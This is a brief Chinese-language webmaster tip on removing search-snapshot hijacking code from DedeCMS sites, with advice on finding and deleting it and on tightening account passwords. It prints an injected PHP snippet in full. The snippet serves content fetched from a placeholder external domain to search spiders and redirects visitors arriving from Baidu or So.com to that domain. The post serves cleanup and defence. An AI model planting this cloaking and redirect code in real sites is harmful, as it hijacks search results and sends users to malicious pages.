織夢百度快照劫持注入代碼防范及修正，很多站長做站的過程中，都碰過百度快照被劫持等問題，明明已經修復模板文件了，還是沒有更新回正常的快照，以織夢系統為例，

 

往往根目錄/index.php也被植入惡意代碼

 

比如：

 

 

<?php

 

if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if(strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}
?>

 

單這段代碼就直接把搜索引擎蜘蛛搞暈，帶到別的惡意網址去。

 

把其刪掉，如果在index.php里沒找到，但還是存在類似的問題，可以用dw全站搜索下。

 

關于防范，空間，ftp賬號，權限，后臺賬號之類都需要設置下，不能太過簡單